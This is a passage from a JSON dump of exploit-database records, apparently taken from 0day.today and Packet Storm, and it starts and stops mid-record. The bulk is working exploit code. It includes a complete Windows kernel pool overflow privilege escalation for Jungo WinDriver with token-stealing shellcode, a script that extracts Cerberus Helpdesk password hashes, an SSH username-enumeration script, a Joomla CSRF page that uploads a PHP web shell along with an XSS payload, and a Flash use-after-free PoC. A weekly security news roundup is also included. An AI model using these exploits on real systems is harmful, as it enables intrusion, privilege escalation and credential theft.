(result))\r\n\r\ndef get_handles():\r\n\"\"\"\r\nReturn all the processes handles in the system at the time.\r\nCan be done from LI (Low Integrity) level on Windows 7 x86.\r\n\"\"\"\r\nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\nsize = DWORD (sizeof (system_handle_information))\r\nwhile True:\r\nresult = ntdll.NtQuerySystemInformation(\r\nSystemExtendedHandleInformation,\r\nbyref(system_handle_information),\r\nsize,\r\nbyref(size)\r\n)\r\nresult = signed_to_unsigned(result)\r\nif result == STATUS_SUCCESS:\r\nbreak\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(system_handle_information, size.value)\r\nelse:\r\nraise x_file_handles(\"NtQuerySystemInformation\", hex(result))\r\n\r\npHandles = cast(\r\nsystem_handle_information.Handles,\r\nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\nsystem_handle_information.NumberOfHandles)\r\n)\r\nfor handle in pHandles.contents:\r\nyield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n\"\"\"\r\nThis function allocates the shellcode @ the null page making\r\nsure the new OkayToCloseProcedure pointer points to shellcode.\r\n\"\"\"\r\nbaseadd = c_int(0x00000004)\r\nnull_size = c_int(0x1000)\r\n\r\ntokenstealing = (\r\n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n\"\\x00\" )\r\n\r\nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n# first we restore our smashed TypeIndex\r\nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c\r\nsc += tokenstealing\r\nsc += \"\\x90\" * (0x400-len(sc))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(null_size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our junk to the null paged memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_spray():\r\n\"\"\"\r\nSpray the Kernel Pool with IoCompletionReserve and Event Objects.\r\nThe IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.\r\nThese are allocated from the Nonpaged kernel pool.\r\n\"\"\"\r\nhandles = []\r\nIO_COMPLETION_OBJECT = 1\r\nfor i in range(0, 25000):\r\nhandles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\nhHandle = HANDLE(0)\r\nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n# could do with some better validation\r\nif len(handles) > 0:\r\nreturn True\r\nreturn False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n\"\"\"\r\nCraft our special buffer to trigger the overflow.\r\n\"\"\"\r\nprint \"(+) allocating pool overflow input buffer\"\r\nbaseadd = c_int(base)\r\nsize = c_int(input_size)\r\ninput = \"\\x41\" * 0x18 # offset to size\r\ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n\r\n# repair the allocated chunk header...\r\ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n\r\n# filler\r\ninput += \"\\x44\" * (input_size-len(input))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our input buffer memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n\"\"\"\r\nThis triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n\"\"\"\r\nGENERIC_READ = 0x80000000\r\nGENERIC_WRITE = 0x40000000\r\nOPEN_EXISTING = 0x3\r\nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\ndwReturn = c_ulong()\r\ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\ninputbuffer = 0x41414141\r\ninputbuffer_size = 0x5000\r\noutputbuffer_size = 0x5000\r\noutputbuffer = 0x20000000\r\nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\nIoStatusBlock = c_ulong()\r\n\r\nif driver_handle:\r\ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\nreturn True\r\nreturn False\r\n\r\ndef we_can_make_pool_holes():\r\n\"\"\"\r\nThis makes the pool holes that will coalesce into a hole of size 0x460.\r\n\"\"\"\r\nglobal khandlesd\r\nmypid = os.getpid()\r\nkhandlesd = {}\r\nkhandlesl = []\r\n\r\n# leak kernel handles\r\nfor pid, handle, obj in get_handles():\r\n\r\n# mixed object attack\r\nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\nkhandlesd[obj] = handle\r\nkhandlesl.append(obj)\r\n\r\n# Find holes and make our allocation\r\nholes = []\r\nfor obj in khandlesl:\r\n\r\n# obj address is the handle address, but we want to allocation\r\n# address, so we just remove the size of the object header from it.\r\nalloc = obj - 0x30\r\n\r\n# Get allocations at beginning of the page\r\nif (alloc & 0xfffff000) == alloc:\r\nbin = []\r\n\r\n# object sizes\r\nCreateEvent_size = 0x40\r\nIoCompletionReserve_size = 0x60\r\ncombined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\noffset = IoCompletionReserve_size\r\nfor i in range(offset, offset + (7 * combined_size), combined_size):\r\ntry:\r\n# chunks need to be next to each other for the coalesce to take effect\r\nbin.append(khandlesd[obj + i])\r\nbin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\nexcept KeyError:\r\npass\r\n\r\n# make sure it's contiguously allocated memory\r\nif len(tuple(bin)) == 14:\r\nholes.append(tuple(bin))\r\n\r\n# make the holes to fill\r\nfor hole in holes:\r\nfor handle in hole:\r\nkernel32.CloseHandle(handle)\r\nreturn True\r\n\r\ndef trigger_lpe():\r\n\"\"\"\r\nThis function frees the IoCompletionReserve objects and this triggers the\r\nregistered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n\"\"\"\r\n# free the corrupted chunk to trigger OkayToCloseProcedure\r\nfor k, v in khandlesd.iteritems():\r\nkernel32.CloseHandle(v)\r\nos.system(\"cmd.exe\")\r\n\r\ndef main():\r\nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\nif release() != \"7\" or architecture()[0] != \"32bit\":\r\nprint \"(-) although this exploit may work on this system,\"\r\nprint \" it was only designed for Windows 7 x86.\"\r\nsys.exit(-1)\r\n\r\nprint \"(+) spraying pool with mixed objects...\"\r\nif we_can_spray():\r\nprint \"(+) sprayed the pool!\"\r\nprint \"(+) making pool holes...\"\r\nif we_can_make_pool_holes():\r\nprint \"(+) made the pool holes!\"\r\nprint \"(+) allocating shellcode...\"\r\nif we_can_alloc_shellcode():\r\nprint \"(+) allocated the shellcode!\"\r\nprint \"(+) triggering pool overflow...\"\r\nif we_can_trigger_the_pool_overflow():\r\nprint \"(+) elevating privileges!\"\r\ntrigger_lpe()\r\n\r\nif __name__ == '__main__':\r\nmain()<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/28439", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T21:04:52", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "1337DAY-ID-25438", "href": "https://0day.today/exploit/description/25438", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (1)", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n \r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n \r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n \r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n \r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n \r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n \r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n \r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n \r\n(Valid users will result in higher total time).\r\n \r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n \r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n \r\nEddie Harari\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25438"}, {"lastseen": "2018-04-09T17:40:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-03-07T00:00:00", "published": "2016-03-07T00:00:00", "id": "1337DAY-ID-24947", "href": "https://0day.today/exploit/description/24947", "type": "zdt", "title": "Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure", "sourceData": "#!/bin/bash\r\n#####################################################################################\r\n# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #\r\n# Date: 04.02.2016 #\r\n# Exploit Author: asdizzle_ #\r\n# Vendor Homepage: http://www.cerberusweb.com/ #\r\n# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #\r\n# Version: 5 - 6.7 #\r\n# Tested on: Debian 8 / apache2 with cerb 5 #\r\n#####################################################################################\r\n# Prerequisites: #\r\n# -At least one worker must be logged in #\r\n# -/storage/tmp/ dir must be accessible #\r\n# #\r\n# If everything else fails try if there's directory listing in /storage/tmp #\r\n# You might find attachments and even support tickets. #\r\n#####################################################################################\r\n \r\nurl='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)\r\npre='devblocks' # If this doesn't work try 'zend'\r\n \r\necho \"[*] Trying to fetch cache file\"\r\n \r\ncachechk=$(curl -s $url\"/storage/tmp/\"$pre\"_cache---ch_workers\" | grep pass)\r\nif [ -z \"$cachechk\" ];then\r\n echo \"[-] File not found.\"\r\n exit\r\nelse\r\n echo \"[+] Found. Extracting...\"\r\n hashes=$(echo \"$cachechk\" | sed -e 's/s:5/\\n/g' | grep email | cut -d '\"' -f4,8 | sed 's/\"/:/g')\r\n if [ -z \"$hashes\" ];then\r\n echo \"[-] Hash extracting failed\"\r\n else\r\n echo \"[+] Extracting seems to have worked\"\r\n echo\r\n echo \"$hashes\"\r\n fi\r\nfi\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24947"}, {"lastseen": "2018-01-03T11:02:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "1337DAY-ID-24935", "href": "https://0day.today/exploit/description/24935", "type": "zdt", "title": "Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities", "sourceData": "JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and\r\nXSS vulnerabilities\r\n---------------------------------------------------------\r\n \r\nProduct: JSN PowerAdmin Joomla! Extension\r\nVendor: JoomlaShine.com\r\nTested Versions: 2.3.0\r\nOther Vulnerable Versions: Prior versions may also be affected\r\nVendor Notification: 28th January, 2016\r\nAdvisory Publication: 24th February, 2016\r\nCVE Reference: Pending\r\nRatioSec Advisory Reference: RS-2016-001\r\nRisk Level: High\r\nCVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\r\n \r\n---------------------------------------------------------\r\n \r\nRatioSec Research has discovered two cross-site request forgery and\r\nreflected cross-site scripting vulnerabilities in JSN PowerAdmin\r\nJoomla! Extension which can be exploited, respectively, to upload PHP\r\nfiles and run arbitrary HTML and script code in a user's browser\r\nsession in context of the affected web site.\r\n \r\n1) The application allows users to perform certain actions via HTTP\r\nrequests without performing proper checks to verify the requests\r\nvalidity. An authenticated user's browser can be forced to upload PHP\r\nfiles via the extension installer and subsequently execute arbitrary\r\ncommands with the web server privileges by tricking the user into\r\nvisiting a malicious web site.\r\n \r\n2) Input passed to `identified_name` GET parameter when `package` is\r\nset, `option` is set to `com_poweradmin`, `view` is set to\r\n`installer`, and `task` is set to `installer.install` in\r\n`/administrator/index.php` is not properly sanitised before being\r\nreflected. This can be exploited to run arbitrary HTML and script code\r\nin a user's browser session in context of the affected web site.\r\n \r\n---------------------------------------------------------\r\n \r\nProof of Concept\r\n \r\nRead the advisory details on the RatioSec Research website for the\r\nproof of concept code.\r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\n----------------------------------------------------------\r\n \r\nSolution\r\n \r\nNo official solution is currently available.\r\n \r\n----------------------------------------------------------\r\n \r\nTimeline\r\n \r\n- First contact: 27th January, 2016\r\n- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.\r\n- E-mail notice after no response: 02nd February, 2016\r\n- Advisory Publication: 24th February, 2016\r\n \r\n----------------------------------------------------------\r\n \r\nAdvisory URL\r\n \r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\nRatioSec Research\r\n \r\nMail: research at ratiosec dot com\r\nWeb: http://www.ratiosec.com/\r\nTwitter: https://twitter.com/ratio_sec\r\n \r\n \r\n \r\n----------------\r\nProof Of Concept\r\n \r\n1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.\r\n \r\n<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install\", true);\r\n xhr.setRequestHeader(\"Accept\", \"*/*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------167969427914885435381146171168\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------167969427914885435381146171168\\r\\n\" +\r\n \"Content-Disposition: form-data; name=\\\"package\\\"; filename=\\\"bd.phtml\\\"\\r\\n\" +\r\n \"Content-Type: application/octet-stream\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\x3cscript language=\\\"php\\\"\\x3esystem($_GET['cmd']);\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"-----------------------------167969427914885435381146171168--\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i);\r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\nThe file extension .phtml and the <script language=\"php\"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.\r\n \r\nCommand Execution\r\n \r\n2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator\u2019s browser.\r\n \r\nhttp://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert(\"RatioSecResearch\")>\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24935"}, {"lastseen": "2018-03-01T03:39:30", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "id": "1337DAY-ID-25723", "href": "https://0day.today/exploit/description/25723", "type": "zdt", "title": "Adobe Flash MovieClip.lineStyle - Use-After-Frees", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=558\r\n \r\nThere are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. A PoC is as follows:\r\n \r\nthis.createEmptyMovieClip(\"triangle_mc\", this.getNextHighestDepth());\r\nvar o = {toString: func};\r\ntriangle_mc.lineStyle(5, 0xff00ff, 100, true, o, \"round\", \"miter\", 1);\r\n \r\nfunction func(){\r\n \r\n triangle_mc.removeMovieClip();\r\n return \"none\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25723"}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how credit card skimming attacks can impact businesses and how ransomware can use software installations to help hide malicious activities.\n\nRead on:\n\n**[Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>)**\n\n_Trend Micro uncovered recent activity by hacking group Mirrorthief involving the notorious online credit card skimming attack known as Magecart, which impacted 201 online campus stores in the United States and Canada._\n\n**[Hackers Steal $40.7 Million in Bitcoin from Crypto Exchange Binance](<https://www.coindesk.com/hackers-steal-40-7-million-in-bitcoin-from-crypto-exchange-binance>)**\n\n_Hackers stole more than 7,000 bitcoin from crypto exchange Binance and were able to access user API keys, two-factor authentication codes and other information to withdraw $41 million in bitcoin from the exchange._\n\n**[Cyberattack Cripples Baltimore's Government Computer Servers](<https://abcnews.go.com/US/wireStory/cyberattack-cripples-baltimores-government-computer-servers-62888773>)**\n\n_Baltimore's government rushed to shut down most of its computer servers after its network was hit by a ransomware virus, though officials believe it has not touched critical public safety systems. _\n\n**[Dharma Ransomware Uses AV Tool to Distract from Malicious Activities](<https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/>)**\n\n_Trend Micro recently found new samples of Dharma ransomware that are using a new technique: using software installation as a distraction to help hide malicious activities._\n\n**[What Israel\u2019s Strike on Hamas Hackers Means for Cyberwar](<https://www.wired.com/story/israel-hamas-cyberattack-air-strike-cyberwar/>)**\n\n_The Israeli Defense Force claimed that it bombed and partially destroyed one building in Gaza because it was allegedly the base of an active Hamas hacking group._\n\n**[CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit](<https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/>)**\n\n_Trend Micro observed a critical vulnerability involving Confluence that was being exploited by threat actors to perform malicious attacks. _\n\n**[Trump Creates New Cybersecurity Competition with a $25,000 Award](<https://www.rollcall.com/news/congress/trump-creates-new-cybersecurity-competition-with-a-25000-award>)**\n\n_The Trump administration announced steps to address a shortage of cybersecurity workers across the federal government, including sponsorship of a national competition and allowing cyber experts to rotate from one agency to another. _\n\nWhat are your thoughts on hacking groups like Mirrorthief and their impact on businesses and consumers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\nThe post [This Week in Security News: Skimming Attacks and Ransomware](<https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-10T13:00:42", "published": "2019-05-10T13:00:42", "id": "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "href": "https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/", "type": "trendmicroblog", "title": "This Week in Security News: Skimming Attacks and Ransomware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144046/Jungo-DriverWizard-WinDrive-Overflow.html", "id": "PACKETSTORM:144046", "title": "Jungo DriverWizard WinDrive Overflow", "type": "packetstorm", "sourceData": "`# -*- coding: utf-8 -*- \n\"\"\" \nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability \n \nDownload: http://www.jungo.com/st/products/windriver/ \nFile: WD1240.EXE \nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba \nDriver: windrvr1240.sys \nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad \nCVE: CVE-2017-14153 \nAuthor: Steven Seeley (mr_me) of Source Incite \nAffected: <= v12.4.0 \nThanks: b33f, ryujin and sickness \nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html \n \nSummary: \n======== \n \nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \n \nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. \n \nTimeline: \n========= \n \n2017-08-22 a Verified and sent to Jungo via sales@/first@/security@/info@jungo.com \n2017-08-25 a No response from Jungo and two bounced emails \n2017-08-26 a Attempted a follow up with the vendor via website chat \n2017-08-26 a No response via the website chat \n2017-09-03 a Recieved an email from a Jungo representative stating that they are \"looking into it\" \n2017-09-03 a Requested a timeframe for patch development and warned of possible 0day release \n2017-09-06 a No response from Jungo \n2017-09-06 a Public 0day release of advisory \n \nExample: \n======== \n \nC:\\Users\\Guest\\Desktop>icacls poc.py \npoc.py NT AUTHORITY\\Authenticated Users:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Users:(I)(F) \nMandatory Label\\Low Mandatory Level:(I)(NW) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nC:\\Users\\Guest\\Desktop>whoami \ndebugee\\guest \n \nC:\\Users\\Guest\\Desktop>poc.py \n \n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] \nSteven Seeley (mr_me) of Source Incite \n \n(+) spraying pool with mixed objects... \n(+) sprayed the pool! \n(+) making pool holes... \n(+) made the pool holes! \n(+) allocating shellcode... \n(+) allocated the shellcode! \n(+) triggering pool overflow... \n(+) allocating pool overflow input buffer \n(+) elevating privileges! \nMicrosoft Windows [Version 6.1.7601] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. \n \nC:\\Users\\Guest\\Desktop>whoami \nnt authority\\system \n \nC:\\Users\\Guest\\Desktop> \n\"\"\" \nfrom ctypes import * \nfrom ctypes.wintypes import * \nimport struct, sys, os, time \nfrom platform import release, architecture \n \nntdll = windll.ntdll \nkernel32 = windll.kernel32 \nMEM_COMMIT = 0x00001000 \nMEM_RESERVE = 0x00002000 \nPAGE_EXECUTE_READWRITE = 0x00000040 \nSTATUS_SUCCESS = 0x0 \nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004 \nSTATUS_INVALID_HANDLE = 0xC0000008 \nSystemExtendedHandleInformation = 64 \n \nclass LSA_UNICODE_STRING(Structure): \n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\" \n_fields_ = [ \n(\"Length\", USHORT), \n(\"MaximumLength\", USHORT), \n(\"Buffer\", LPWSTR), \n] \n \nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\" \n_fields_ = [ \n(\"Object\", c_void_p), \n(\"UniqueProcessId\", ULONG), \n(\"HandleValue\", ULONG), \n(\"GrantedAccess\", ULONG), \n(\"CreatorBackTraceIndex\", USHORT), \n(\"ObjectTypeIndex\", USHORT), \n(\"HandleAttributes\", ULONG), \n(\"Reserved\", ULONG), \n] \n \nclass SYSTEM_HANDLE_INFORMATION_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"NumberOfHandles\", ULONG), \n(\"Reserved\", ULONG), \n(\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), \n] \n \nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure): \n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"Name\", LSA_UNICODE_STRING), \n(\"Reserved\", ULONG * 22), \n] \n \nclass 